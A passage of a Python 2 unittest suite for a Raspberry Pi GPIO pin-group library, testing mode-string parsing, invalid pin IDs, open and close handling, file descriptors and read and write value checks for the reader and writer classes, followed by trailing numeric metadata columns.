self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'wNS'),pingroup.PinListWriter)
def test_open_pins_for_writing_some_blocking_mode_fails(self):
with self.assertRaises( error.PinBlockModeInvalidError ):
pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'wRI')
with self.assertRaises( error.PinBlockModeInvalidError ):
pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'wFS')
with self.assertRaises( error.PinBlockModeInvalidError ):
pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'wBI')
with self.assertRaises( error.PinBlockModeInvalidError ):
pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'wR')
with self.assertRaises( error.PinBlockModeInvalidError ):
pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'wF')
with self.assertRaises( error.PinBlockModeInvalidError ):
pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'wB')
def test_open_pins_for_reading_bad_blocking_mode_fails(self):
with self.assertRaises( error.PinBlockModeInvalidError ):
pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'rXS')
def test_open_pins_for_reading_bad_format_mode_fails(self):
with self.assertRaises( error.PinGroupFormatModeInvalidError ):
pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'rBX')
def test_open_pins_for_reading_bad_blocking_or_format_mode_fails(self):
with self.assertRaises( error.PinGroupOpenModeInvalidError ):
pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'r#')
def test_open_pins_bad_rw_mode_fails(self):
with self.assertRaises( error.PinDirectionModeInvalidError ):
pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'a')
def test_open_pins_bad_mode_string_fails(self):
with self.assertRaises( error.PinGroupOpenModeInvalidError ):
pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'rNS+')
def test_open_pin_for_reading_creates_PinWordReader(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'r'),pingroup.PinWordReader)
def test_open_pin_for_reading_nonblocking_mode_creates_creates_PinWordReader(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'rN'),pingroup.PinWordReader)
def test_open_pin_for_reading_integer_mode_creates_creates_PinWordReader(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'rI'),pingroup.PinWordReader)
def test_open_pin_for_reading_nonblocking_integer_mode_creates_creates_PinWordReader(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'rNI'),pingroup.PinWordReader)
def test_open_pin_default_mode_creates_PinWordReader(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()]),pingroup.PinWordReader)
def test_open_pin_empty_mode_creates_PinWordReader(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],''),pingroup.PinWordReader)
def test_open_pin_for_reading_sequence_mode_creates_creates_PinListReader(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'rS'),pingroup.PinListReader)
def test_open_pin_for_reading_nonblocking_sequence_mode_creates_creates_PinListReader(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'rNS'),pingroup.PinListReader)
def test_open_pin_for_reading_blockonfallingedge_creates_PinWordBlockingReader(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'rF'),pingroup.PinWordBlockingReader)
def test_open_pin_for_reading_blockonrisingedge_creates_PinWordBlockingReader(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'rR'),pingroup.PinWordBlockingReader)
def test_open_pin_for_reading_blockonbothedges_creates_PinWordBlockingReader(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'rB'),pingroup.PinWordBlockingReader)
def test_open_pin_for_reading_blockonfallingedge_integer_mode_creates_PinWordBlockingReader(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'rFI'),pingroup.PinWordBlockingReader)
def test_open_pin_for_reading_blockonrisingedge_integer_mode_creates_PinWordBlockingReader(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'rRI'),pingroup.PinWordBlockingReader)
def test_open_pin_for_reading_blockonbothedges_integer_mode_creates_PinWordBlockingReader(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'rBI'),pingroup.PinWordBlockingReader)
def test_open_pin_for_reading_blockonfallingedge_sequence_mode_creates_PinListBlockingReader(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'rFS'),pingroup.PinListBlockingReader)
def test_open_pin_for_reading_blockonrisingedge_sequence_mode_creates_PinListBlockingReader(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'rRS'),pingroup.PinListBlockingReader)
def test_open_pin_for_reading_blockonbothedges_sequence_mode_creates_PinListBlockingReader(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'rBS'),pingroup.PinListBlockingReader)
class PinWordReaderPlatformTests(unittest.TestCase):
def tearDown(self):
cleaned_up = []
for v in RPiPinIdSet.valid_ids(pingroup.PinId._get_rpi_major_revision_index()):
id = force_free_pin(pingroup.PinId.gpio(v))
if (id!=None):
cleaned_up.append(id)
if ( cleaned_up != [] ):
print "\nCleaned up left over exports for pins", cleaned_up
self.assertEqual(cleaned_up,[])
def test_invalid_pin_ids_sequence_fail_pin_creation(self):
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinWordReader(23)
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinWordReader(None)
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinWordReader(1.234)
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinWordReader(False)
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinWordReader([])
def test_invalid_pin_ids_fail_pin_creation(self):
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinWordReader([-1])
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinWordReader(["Nan"])
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinWordReader("Nan") # strings are iterable sequences!
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinWordReader([100000])
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinWordReader([None])
def test_already_used_pin_id_fails_pin_creation_and_closes_any_open_pins(self):
with self.assertRaises( error.PinInUseError ):
a_pin_group = pingroup.PinWordReader([4,23,23])
# try to open pins 4 & 23 again - if they were not closed when
# above group create failed then PinInUseError will be thrown.
a_pin_group = pingroup.PinWordReader([23,4])
def test_close_closes_all_opened_pins(self):
a_pin_group = pingroup.PinWordReader([23,4,7])
a_pin_group.close()
a_pin_group = pingroup.PinWordReader([23,4,7])
def test_closed_reports_pin_group_state(self):
a_pin_group = pingroup.PinWordReader([23,4,7])
self.assertFalse(a_pin_group.closed())
a_pin_group.close()
self.assertTrue(a_pin_group.closed())
def test_multiple_close_calls_do_nothing_bad(self):
a_pin_group = pingroup.PinWordReader([23,4,7])
a_pin_group.close()
a_pin_group.close()
a_pin_group.close()
self.assertTrue(a_pin_group.closed())
def test_pin_group_closed_on_with_exit(self):
outside_pg = None
with pingroup.PinWordReader([23,4,7]) as pg:
outside_pg = pg
self.assertFalse(pg.closed())
self.assertFalse(outside_pg.closed())
self.assertTrue(outside_pg.closed())
pingroup.PinWordReader([23,4,7])
def test_file_descriptors_returns_expected_number_and_type_of_descriptors(self):
a_pin_group = pingroup.PinWordReader([23,4,7])
a_pin_group_fds = a_pin_group.file_descriptors()
self.assertEqual(len(a_pin_group_fds), 3)
for fd in a_pin_group_fds:
self.assertIsInstance(fd, int)
def test_file_descriptors_returns_empty_list_if_pin_group_closed(self):
a_pin_group = pingroup.PinWordReader([23,4,7])
a_pin_group.close()
a_pin_group_fds = a_pin_group.file_descriptors()
self.assertFalse(a_pin_group_fds)
def test_read_closed_group_raises_ValueError(self):
a_pin_group = pingroup.PinWordReader([23,4,7])
a_pin_group.close()
with self.assertRaises( ValueError ):
a_pin_group.read()
def test_read_returns_integer_type(self):
a_pin_group = pingroup.PinWordReader([23,4,7])
self.assertIsInstance(a_pin_group.read(), (int,long))
a_pin_group.close()
class PinListReaderPlatformTests(unittest.TestCase):
def tearDown(self):
cleaned_up = []
for v in RPiPinIdSet.valid_ids(pingroup.PinId._get_rpi_major_revision_index()):
id = force_free_pin(pingroup.PinId.gpio(v))
if (id!=None):
cleaned_up.append(id)
if ( cleaned_up != [] ):
print "\nCleaned up left over exports for pins", cleaned_up
self.assertEqual(cleaned_up,[])
def test_invalid_pin_ids_sequence_fail_pin_creation(self):
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinListReader(23)
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinListReader(None)
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinListReader(1.234)
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinListReader(False)
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinListReader([])
def test_invalid_pin_ids_fail_pin_creation(self):
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinListReader([-1])
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinListReader(["Nan"])
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinListReader("Nan") # strings are iterable sequences!
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinListReader([100000])
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinListReader([None])
def test_already_used_pin_id_fails_pin_creation_and_closes_any_open_pins(self):
with self.assertRaises( error.PinInUseError ):
a_pin_group = pingroup.PinListReader([4,23,23])
# try to open pins 4 & 23 again - if they were not closed when
# above group create failed then PinInUseError will be thrown.
a_pin_group = pingroup.PinListReader([23,4])
def test_close_closes_all_opened_pins(self):
a_pin_group = pingroup.PinListReader([23,4,7])
a_pin_group.close()
a_pin_group = pingroup.PinListReader([23,4,7])
def test_closed_reports_pin_group_state(self):
a_pin_group = pingroup.PinListReader([23,4,7])
self.assertFalse(a_pin_group.closed())
a_pin_group.close()
self.assertTrue(a_pin_group.closed())
def test_multiple_close_calls_do_nothing_bad(self):
a_pin_group = pingroup.PinListReader([23,4,7])
a_pin_group.close()
a_pin_group.close()
a_pin_group.close()
self.assertTrue(a_pin_group.closed())
def test_pin_group_closed_on_with_exit(self):
outside_pg = None
with pingroup.PinListReader([23,4,7]) as pg:
outside_pg = pg
self.assertFalse(pg.closed())
self.assertFalse(outside_pg.closed())
self.assertTrue(outside_pg.closed())
pingroup.PinListReader([23,4,7])
def test_file_descriptors_returns_expected_number_and_type_of_descriptors(self):
a_pin_group = pingroup.PinListReader([23,4,7])
a_pin_group_fds = a_pin_group.file_descriptors()
self.assertEqual(len(a_pin_group_fds), 3)
for fd in a_pin_group_fds:
self.assertIsInstance(fd, int)
def test_file_descriptors_returns_empty_list_if_pin_group_closed(self):
a_pin_group = pingroup.PinListReader([23,4,7])
a_pin_group.close()
a_pin_group_fds = a_pin_group.file_descriptors()
self.assertFalse(a_pin_group_fds)
def test_read_closed_group_raises_ValueError(self):
a_pin_group = pingroup.PinListReader([23,4,7])
a_pin_group.close()
with self.assertRaises( ValueError ):
a_pin_group.read()
def test_read_returns_iterable_type(self):
a_pin_group = pingroup.PinListReader([23,4,7])
self.assertIsInstance(a_pin_group.read(), collections.Iterable)
a_pin_group.close()
class PinWordBlockingReaderPlatformTests(unittest.TestCase):
def tearDown(self):
cleaned_up = []
for v in RPiPinIdSet.valid_ids(pingroup.PinId._get_rpi_major_revision_index()):
id = force_free_pin(pingroup.PinId.gpio(v))
if (id!=None):
cleaned_up.append(id)
if ( cleaned_up != [] ):
print "\nCleaned up left over exports for pins", cleaned_up
self.assertEqual(cleaned_up,[])
def test_invalid_pin_ids_sequence_fail_pin_creation(self):
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinWordBlockingReader(23,'B')
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinWordBlockingReader(None,'B')
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinWordBlockingReader(1.234,'B')
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinWordBlockingReader(False,'B')
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinWordBlockingReader([],'B')
def test_invalid_pin_ids_fail_pin_creation(self):
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinWordBlockingReader([-1],'B')
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinWordBlockingReader(["Nan"],'B')
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinWordBlockingReader("Nan",'B') # strings are iterable sequences!
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinWordBlockingReader([100000],'B')
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinWordBlockingReader([None],'B')
def test_invalid_blocking_mode_fail_pin_creation(self):
with self.assertRaises( error.PinBlockModeInvalidError ):
a_pin_group = pingroup.PinWordBlockingReader([7],'N')
with self.assertRaises( error.PinBlockModeInvalidError ):
a_pin_group = pingroup.PinWordBlockingReader([7],'X')
with self.assertRaises( TypeError ):
a_pin_group = pingroup.PinWordBlockingReader([7],23)
with self.assertRaises( TypeError ):
a_pin_group = pingroup.PinWordBlockingReader([7],[5])
with self.assertRaises( TypeError ):
a_pin_group = pingroup.PinWordBlockingReader([7],None)
def test_already_used_pin_id_fails_pin_creation_and_closes_any_open_pins(self):
with self.assertRaises( error.PinInUseError ):
a_pin_group = pingroup.PinWordBlockingReader([4,23,23],'B')
# try to open pins 4 & 23 again - if they were not closed when
# above group create failed then PinInUseError will be thrown.
a_pin_group = pingroup.PinWordBlockingReader([23,4],'B')
def test_close_closes_all_opened_pins(self):
a_pin_group = pingroup.PinWordBlockingReader([23,4,7],'B')
a_pin_group.close()
a_pin_group = pingroup.PinWordBlockingReader([23,4,7],'B')
def test_closed_reports_pin_group_state(self):
a_pin_group = pingroup.PinWordBlockingReader([23,4,7],'B')
self.assertFalse(a_pin_group.closed())
a_pin_group.close()
self.assertTrue(a_pin_group.closed())
def test_multiple_close_calls_do_nothing_bad(self):
a_pin_group = pingroup.PinWordBlockingReader([23,4,7],'B')
a_pin_group.close()
a_pin_group.close()
a_pin_group.close()
self.assertTrue(a_pin_group.closed())
def test_pin_group_closed_on_with_exit(self):
outside_pg = None
with pingroup.PinWordBlockingReader([23,4,7],'B') as pg:
outside_pg = pg
self.assertFalse(pg.closed())
self.assertFalse(outside_pg.closed())
self.assertTrue(outside_pg.closed())
pingroup.PinWordBlockingReader([23,4,7],'B')
def test_file_descriptors_returns_expected_number_and_type_of_descriptors(self):
a_pin_group = pingroup.PinWordBlockingReader([23,4,7],'B')
a_pin_group_fds = a_pin_group.file_descriptors()
self.assertEqual(len(a_pin_group_fds), 3)
for fd in a_pin_group_fds:
self.assertIsInstance(fd, int)
def test_file_descriptors_returns_empty_list_if_pin_group_closed(self):
a_pin_group = pingroup.PinWordBlockingReader([23,4,7],'B')
a_pin_group.close()
a_pin_group_fds = a_pin_group.file_descriptors()
self.assertFalse(a_pin_group_fds)
def test_read_closed_group_raises_ValueError(self):
a_pin_group = pingroup.PinWordBlockingReader([23,4,7],'B')
a_pin_group.close()
with self.assertRaises( ValueError ):
a_pin_group.read(0)
def test_polled_read_returns_integer_type(self):
a_pin_group = pingroup.PinWordBlockingReader([23,4,7],'B')
self.assertIsInstance(a_pin_group.read(0), (int,long))
a_pin_group.close()
def test_timeout_read_returns_None(self):
a_pin_group = pingroup.PinWordBlockingReader([23,4,7],'B')
a_pin_group.read(0) # reset initial signalled states
self.assertIsNone(a_pin_group.read(0.001))
a_pin_group.close()
class PinListBlockingReaderPlatformTests(unittest.TestCase):
def tearDown(self):
cleaned_up = []
for v in RPiPinIdSet.valid_ids(pingroup.PinId._get_rpi_major_revision_index()):
id = force_free_pin(pingroup.PinId.gpio(v))
if (id!=None):
cleaned_up.append(id)
if ( cleaned_up != [] ):
print "\nCleaned up left over exports for pins", cleaned_up
self.assertEqual(cleaned_up,[])
def test_invalid_pin_ids_sequence_fail_pin_creation(self):
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinListBlockingReader(23,'B')
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinListBlockingReader(None,'B')
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinListBlockingReader(1.234,'B')
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinListBlockingReader(False,'B')
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinListBlockingReader([],'B')
def test_invalid_pin_ids_fail_pin_creation(self):
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinListBlockingReader([-1],'B')
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinListBlockingReader(["Nan"],'B')
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinListBlockingReader("Nan",'B') # strings are iterable sequences!
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinListBlockingReader([100000],'B')
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinListBlockingReader([None],'B')
def test_invalid_blocking_mode_fail_pin_creation(self):
with self.assertRaises( error.PinBlockModeInvalidError ):
a_pin_group = pingroup.PinListBlockingReader([7],'N')
with self.assertRaises( error.PinBlockModeInvalidError ):
a_pin_group = pingroup.PinListBlockingReader([7],'X')
with self.assertRaises( TypeError ):
a_pin_group = pingroup.PinListBlockingReader([7],23)
with self.assertRaises( TypeError ):
a_pin_group = pingroup.PinListBlockingReader([7],[5])
with self.assertRaises( TypeError ):
a_pin_group = pingroup.PinListBlockingReader([7],None)
def test_already_used_pin_id_fails_pin_creation_and_closes_any_open_pins(self):
with self.assertRaises( error.PinInUseError ):
a_pin_group = pingroup.PinListBlockingReader([4,23,23],'B')
# try to open pins 4 & 23 again - if they were not closed when
# above group create failed then PinInUseError will be thrown.
a_pin_group = pingroup.PinListBlockingReader([23,4],'B')
def test_close_closes_all_opened_pins(self):
a_pin_group = pingroup.PinListBlockingReader([23,4,7],'B')
a_pin_group.close()
a_pin_group = pingroup.PinListBlockingReader([23,4,7],'B')
def test_closed_reports_pin_group_state(self):
a_pin_group = pingroup.PinListBlockingReader([23,4,7],'B')
self.assertFalse(a_pin_group.closed())
a_pin_group.close()
self.assertTrue(a_pin_group.closed())
def test_multiple_close_calls_do_nothing_bad(self):
a_pin_group = pingroup.PinListBlockingReader([23,4,7],'B')
a_pin_group.close()
a_pin_group.close()
a_pin_group.close()
self.assertTrue(a_pin_group.closed())
def test_pin_group_closed_on_with_exit(self):
outside_pg = None
with pingroup.PinListBlockingReader([23,4,7],'B') as pg:
outside_pg = pg
self.assertFalse(pg.closed())
self.assertFalse(outside_pg.closed())
self.assertTrue(outside_pg.closed())
pingroup.PinListBlockingReader([23,4,7],'B')
def test_file_descriptors_returns_expected_number_and_type_of_descriptors(self):
a_pin_group = pingroup.PinListBlockingReader([23,4,7],'B')
a_pin_group_fds = a_pin_group.file_descriptors()
self.assertEqual(len(a_pin_group_fds), 3)
for fd in a_pin_group_fds:
self.assertIsInstance(fd, int)
def test_file_descriptors_returns_empty_list_if_pin_group_closed(self):
a_pin_group = pingroup.PinListBlockingReader([23,4,7],'B')
a_pin_group.close()
a_pin_group_fds = a_pin_group.file_descriptors()
self.assertFalse(a_pin_group_fds)
def test_read_closed_group_raises_ValueError(self):
a_pin_group = pingroup.PinListBlockingReader([23,4,7],'B')
a_pin_group.close()
with self.assertRaises( ValueError ):
a_pin_group.read(0)
def test_polled_read_returns_iterable_type(self):
a_pin_group = pingroup.PinListBlockingReader([23,4,7],'B')
self.assertIsInstance(a_pin_group.read(0), collections.Iterable)
a_pin_group.close()
def test_timeout_read_returns_None(self):
a_pin_group = pingroup.PinListBlockingReader([23,4,7],'B')
a_pin_group.read(0) # reset initial signalled states
self.assertIsNone(a_pin_group.read(0.001))
a_pin_group.close()
class PinWordWriterPlatformTests(unittest.TestCase):
def tearDown(self):
cleaned_up = []
for v in RPiPinIdSet.valid_ids(pingroup.PinId._get_rpi_major_revision_index()):
id = force_free_pin(pingroup.PinId.gpio(v))
if (id!=None):
cleaned_up.append(id)
if ( cleaned_up != [] ):
print "\nCleaned up left over exports for pins", cleaned_up
self.assertEqual(cleaned_up,[])
def test_invalid_pin_ids_sequence_fail_pin_creation(self):
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinWordWriter(23)
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinWordWriter(None)
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinWordWriter(1.234)
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinWordWriter(False)
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinWordWriter([])
def test_invalid_pin_ids_fail_pin_creation(self):
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinWordWriter([-1])
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinWordWriter(["Nan"])
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinWordWriter("Nan") # strings are iterable sequences!
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinWordWriter([100000])
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinWordWriter([None])
def test_already_used_pin_id_fails_pin_creation_and_closes_any_open_pins(self):
with self.assertRaises( error.PinInUseError ):
a_pin_group = pingroup.PinWordWriter([4,23,23])
# try to open pins 4 & 23 again - if they were not closed when
# above group create failed then PinInUseError will be thrown.
a_pin_group = pingroup.PinWordWriter([23,4])
def test_close_closes_all_opened_pins(self):
a_pin_group = pingroup.PinWordWriter([23,4,7])
a_pin_group.close()
a_pin_group = pingroup.PinWordWriter([23,4,7])
def test_closed_reports_pin_group_state(self):
a_pin_group = pingroup.PinWordWriter([23,4,7])
self.assertFalse(a_pin_group.closed())
a_pin_group.close()
self.assertTrue(a_pin_group.closed())
def test_multiple_close_calls_do_nothing_bad(self):
a_pin_group = pingroup.PinWordWriter([23,4,7])
a_pin_group.close()
a_pin_group.close()
a_pin_group.close()
self.assertTrue(a_pin_group.closed())
def test_pin_group_closed_on_with_exit(self):
outside_pg = None
with pingroup.PinWordWriter([23,4,7]) as pg:
outside_pg = pg
self.assertFalse(pg.closed())
self.assertFalse(outside_pg.closed())
self.assertTrue(outside_pg.closed())
pingroup.PinWordWriter([23,4,7])
def test_file_descriptors_returns_expected_number_and_type_of_descriptors(self):
a_pin_group = pingroup.PinWordWriter([23,4,7])
a_pin_group_fds = a_pin_group.file_descriptors()
self.assertEqual(len(a_pin_group_fds), 3)
for fd in a_pin_group_fds:
self.assertIsInstance(fd, int)
def test_file_descriptors_returns_empty_list_if_pin_group_closed(self):
a_pin_group = pingroup.PinWordWriter([23,4,7])
a_pin_group.close()
a_pin_group_fds = a_pin_group.file_descriptors()
self.assertFalse(a_pin_group_fds)
def test_read_closed_group_raises_ValueError(self):
a_pin_group = pingroup.PinWordWriter([23,4,7])
a_pin_group.close()
with self.assertRaises( ValueError ):
a_pin_group.write(0)
def test_write_non_scalar_value_raises_TypeError(self):
a_pin_group = pingroup.PinWordWriter([23,4,7])
with self.assertRaises( TypeError ):
a_pin_group.write(["Nan"])
with self.assertRaises( TypeError ):
a_pin_group.write([1,0,1])
with self.assertRaises( TypeError ):
a_pin_group.write([True, False, True])
a_pin_group.close()
def test_write_scalar_value_not_convertible_to_integer_raises_ValueError(self):
a_pin_group = pingroup.PinWordWriter([23,4,7])
with self.assertRaises( ValueError ):
a_pin_group.write("Nan")
a_pin_group.close()
def test_write_out_of_range_value_raises_ValueError(self):
a_pin_group = pingroup.PinWordWriter([23,4,7])
with self.assertRaises( ValueError ):
a_pin_group.write(-1)
with self.assertRaises( ValueError ):
a_pin_group.write(8)
a_pin_group.close()
class PinListWriterPlatformTests(unittest.TestCase):
def tearDown(self):
cleaned_up = []
for v in RPiPinIdSet.valid_ids(pingroup.PinId._get_rpi_major_revision_index()):
id = force_free_pin(pingroup.PinId.gpio(v))
if (id!=None):
cleaned_up.append(id)
if ( cleaned_up != [] ):
print "\nCleaned up left over exports for pins", cleaned_up
self.assertEqual(cleaned_up,[])
def test_invalid_pin_ids_sequence_fail_pin_creation(self):
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinListWriter(23)
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinListWriter(None)
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinListWriter(1.234)
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinListWriter(False)
with self.assertRaises( error.PinGroupIdsInvalidError ):
a_pin_group = pingroup.PinListWriter([])
def test_invalid_pin_ids_fail_pin_creation(self):
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinListWriter([-1])
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinListWriter(["Nan"])
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinListWriter("Nan") # strings are iterable sequences!
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinListWriter([100000])
with self.assertRaises( error.PinIdInvalidError ):
a_pin_group = pingroup.PinListWriter([None])
def test_already_used_pin_id_fails_pin_creation_and_closes_any_open_pins(self):
with self.assertRaises( error.PinInUseError ):
a_pin_group = pingroup.PinListWriter([4,23,23])
# try to open pins 4 & 23 again - if they were not closed when
# above group create failed then PinInUseError will be thrown.
a_pin_group = pingroup.PinListWriter([23,4])
def test_close_closes_all_opened_pins(self):
a_pin_group = pingroup.PinListWriter([23,4,7])
a_pin_group.close()
a_pin_group = pingroup.PinListWriter([23,4,7])
def test_closed_reports_pin_group_state(self):
a_pin_group = pingroup.PinListWriter([23,4,7])
self.assertFalse(a_pin_group.closed())
a_pin_group.close()
self.assertTrue(a_pin_group.closed())
def test_multiple_close_calls_do_nothing_bad(self):
a_pin_group = pingroup.PinListWriter([23,4,7])
a_pin_group.close()
a_pin_group.close()
a_pin_group.close()
self.assertTrue(a_pin_group.closed())
def test_pin_group_closed_on_with_exit(self):
outside_pg = None
with pingroup.PinListWriter([23,4,7]) as pg:
outside_pg = pg
self.assertFalse(pg.closed())
self.assertFalse(outside_pg.closed())
self.assertTrue(outside_pg.closed())
pingroup.PinListWriter([23,4,7])
def test_file_descriptors_returns_expected_number_and_type_of_descriptors(self):
a_pin_group = pingroup.PinListWriter([23,4,7])
a_pin_group_fds = a_pin_group.file_descriptors()
self.assertEqual(len(a_pin_group_fds), 3)
for fd in a_pin_group_fds:
self.assertIsInstance(fd, int)
def test_file_descriptors_returns_empty_list_if_pin_group_closed(self):
a_pin_group = pingroup.PinListWriter([23,4,7])
a_pin_group.close()
a_pin_group_fds = a_pin_group.file_descriptors()
self.assertFalse(a_pin_group_fds)
def test_read_closed_group_raises_ValueError(self):
a_pin_group = pingroup.PinListWriter([23,4,7])
a_pin_group.close()
with self.assertRaises( ValueError ):
a_pin_group.write([0,0,0])
def test_write_non_iterable_value_raises_TypeError(self):
a_pin_group = pingroup.PinListWriter([23,4,7])
with self.assertRaises( TypeError ):
a_pin_group.write(1)
with self.assertRaises( TypeError ):
a_pin_group.write(False)
with self.assertRaises( TypeError ):
a_pin_group.write(None)
with self.assertRaises( TypeError ):
a_pin_group.write(set([True, False, True]))
a_pin_group.close()
def test_write_iterable_wrong_number_of_elements_raises_TypeError(self):
a_pin_group = pingroup.PinListWriter([23,4,7])
with self.assertRaises( TypeError ):
a_pin_group.write([])
with self.assertRaises( TypeError ):
a_pin_group.write([1])
with self.assertRaises( TypeError ):
a_pin_group.write([1,2])
with self.assertRaises( TypeError ):
a_pin_group.write([1,2,3,4])
a_pin_group.close()
def test_write_iterable_right_number_of_elements_raises_nothing(self):
a_pin_group = pingroup.PinListWriter([23,4,7])
a_pin_group.write([False,0,[]])
a_pin_group.close()
if __name__ == '__main__':
unittest.main()
| 47.717722
| 123
| 0.703345
| 4,621
| 37,697
| 5.390175
| 0.053452
| 0.095712
| 0.100811
| 0.092822
| 0.96198
| 0.947888
| 0.938654
| 0.92388
| 0.889393
| 0.856994
| 0
| 0.017897
| 0.198132
| 37,697
| 789
| 124
| 47.7782
| 0.806107
| 0.027774
| 0
| 0.673846
| 0
| 0
| 0.013198
| 0
| 0
| 0
| 0
| 0
| 0.307692
| 0
| null | null | 0
| 0.012308
| null | null | 0.010769
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
